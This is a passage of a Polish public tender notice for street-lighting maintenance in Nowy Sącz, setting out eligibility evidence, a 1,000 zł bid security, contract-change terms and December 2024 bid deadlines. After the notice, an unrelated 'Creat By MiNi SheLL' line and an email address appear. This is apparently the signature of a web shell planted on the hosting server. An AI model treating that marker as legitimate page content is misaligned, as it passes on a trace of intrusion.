weryfikacji ilości materiałów zgromadzonych w magazynie przez pracownika Zamawiającego. <br/><br/>2.	Wykonawca w celu potwierdzenia spełniania warunków udziału w postępowaniu, może polegać na zdolnościach technicznych lub zawodowych lub sytuacji finansowej lub ekonomicznej innych podmiotów, niezależnie od charakteru prawnego łączących go z nim stosunków prawnych. W takiej sytuacji wykonawca zobowiązany jest udowodnić, że realizując zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów, w szczególności przedstawiając zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacji zamówienia. Wykonawca, który polega na sytuacji finansowej lub ekonomicznej innych podmiotów, odpowiada solidarnie z podmiotem, który zobowiązał się do udostępnienia zasobów, za szkodę poniesioną przez zamawiającego, powstałą wskutek nieudostępnienia tych zasobów, chyba że za nieudostępnienie zasobów nie ponosi winy.<br/>W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia, wykonawca może polegać na zdolnościach innych podmiotów, jeśli podmioty te zrealizują roboty budowlane lub usługi, do realizacji których te zdolności są wymagane. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Zgodnie z SWZ</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">3.	W celu potwierdzenia spełniania przez wykonawcę warunków udziału w postępowaniu, zamawiający od Wykonawcy, którego oferta została oceniona najwyżej żąda dostarczenia w wyznaczonym terminie zgodnie z art. 274 ust. 1 ustawy PZP: <br/>1)	w zakresie posiadania kompetencji lub uprawnień do prowadzenia określonej działalności:<br/>a)	oświadczenia o posiadaniu niezbędnych kompetencji lub uprawnień do realizacji zamówienia – ocena spełniania warunku w oparciu o oświadczenie o spełnianiu warunków udziału w postępowaniu.<br/>2)	w zakresie sytuacji ekonomicznej lub finansowej <br/>a)	dokumentu potwierdzającego, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia ze wskazaniem sumy gwarancyjnej tego ubezpieczenia, która jest nie niższa niż 100 000,00 zł.<br/>3)	w zakresie zdolności technicznej lub zawodowej:<br/>a)	wykaz usług wykonanych nie wcześniej niż w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, zgodnie ze wzorem stanowiącym załącznik nr 4, wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których usługi te zostały wykonane oraz załączeniem dowodów określających, czy te usługi zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego usługi zostały wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów- inne odpowiednie dokumenty;<br/>b)	wykaz osób, którymi Wykonawca będzie dysponował przy realizacji zamówienia, zgodnie z wymogami pkt V ust. 1 ppkt 2c na wzorze stanowiącym załącznik nr 5 wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnego do wykonywania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami. <br/>c)	wykaz sprzętu, którym wykonawca będzie dysponował przy realizacji zamówienia, zgodnie ze wzorem stanowiącym załącznik nr 11.</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1.	Przystępując do przedmiotowego postępowania Wykonawca zobowiązany jest do wniesienia wadium w wysokości 1 000,00 zł (słownie: jeden tysiąc złotych 00/100).<br/>2.	Wadium może zostać wniesione w jednej lub kilku następujących formach:<br/>1)	pieniądzu;<br/>2)	gwarancjach bankowych;<br/>3)	gwarancjach ubezpieczeniowych;<br/>4)	poręczeniach udzielonych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000r. o utworzeniu Polskiej Agencji Przedsiębiorczości ( t.j. Dz. U z 2024 r. poz. 419 z późn. zm.).<br/>3.	Wadium należy nieść przed upływem terminu składania ofert. <br/>4.	Wadium w pieniądzu należy wnieść na rachunek bankowy Zamawiającego nr 40 1050 1445 1000 0023 5306 5192 z podaniem w tytule wpłaty „Bieżące utrzymanie i konserwacja oświetlenia ulicznego Miasta Nowego Sącza w terminie od 01.01.2025 r. do 30.06.2025 r. – wadium”.<br/>Za termin wniesienia wadium uznaje się termin uznania wpłaty na rachunku Zamawiającego.<br/>5.	Jeżeli wadium zostanie wniesione w walucie obcej, kwota wadium zostanie przeliczona na PLN wg średniego kursu PLN w stosunku do walut obcych, ogłaszanego przez Narodowy Bank Polski w dniu publikacji ogłoszenia o zamówieniu w Biuletynie Zamówień Publicznych.<br/>6.	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia Zamawiający wymaga aby poręczenie lub gwarancja obejmowała swą treścią (tj. zobowiązanych z tytułu poręczenia lub gwarancji) wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia lub aby z jej treści wynikało, że zabezpiecza ofertę Wykonawców wspólnie ubiegających się o udzielenie zamówienia.<br/>7.	Wadium będzie realizowane na zasadach wskazanych w ustawie PZP. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający dopuszcza również możliwość wprowadzenia zmian umowy w przypadkach, o których mowa w art. 454 ust. 1 pkt 1 ustawy PZP gdy dotyczą one:<br/>1)	zmiany danych identyfikacyjnych strony umowy;<br/>2)	likwidacji oczywistych omyłek pisarskich i rachunkowych w treści umowy;<br/>3)	terminu realizacji przedmiotu umowy;<br/>4)	wysokości ostatecznego wynagrodzenia; <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-12-17 08:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">www.platformazakupowa.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-12-17 08:05</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: <span class="normal">Tak</span></h3> <h3 class="mb-0">8.6.) Maksymalna liczba wykonawców, którzy zostaną zaproszeni do negocjacji: <span class="normal">3</span></h3> <h3 class="mb-0">8.7) Kryteria oceny ofert, które zamawiający zamierza stosować w celu ograniczenia liczby wykonawców: </h3> 1.	Zamówienie udzielane jest w trybie podstawowym z możliwością przeprowadzenia negocjacji, o którym mowa w art. 275 ust. 2 ustawy z dnia 11 września 2019 r. Prawo zamówień publicznych (t.j. Dz. U. z 2024r. poz. 1320 z późn).<br/>2.	Zgodnie z art. 288 ust. 2 ustawy PZP Zamawiający ogranicza liczbę wykonawców, których zaprosi do negocjacji ofert, do 3 (słownie: trzech).<br/>3.	Stosownie do art. 288 ust.3 ustawy PZP Zamawiający określa kryteria oceny ofert, które zamierza stosować w celu ograniczenia liczby wykonawców zapraszanych do negocjacji ofert: zgodnie z kryteriami, którymi zamawiający będzie się kierował przy wyborze oferty opisanymi w rozdziale XIV.

Creat By MiNi SheLL
Email: jattceo@gmail.com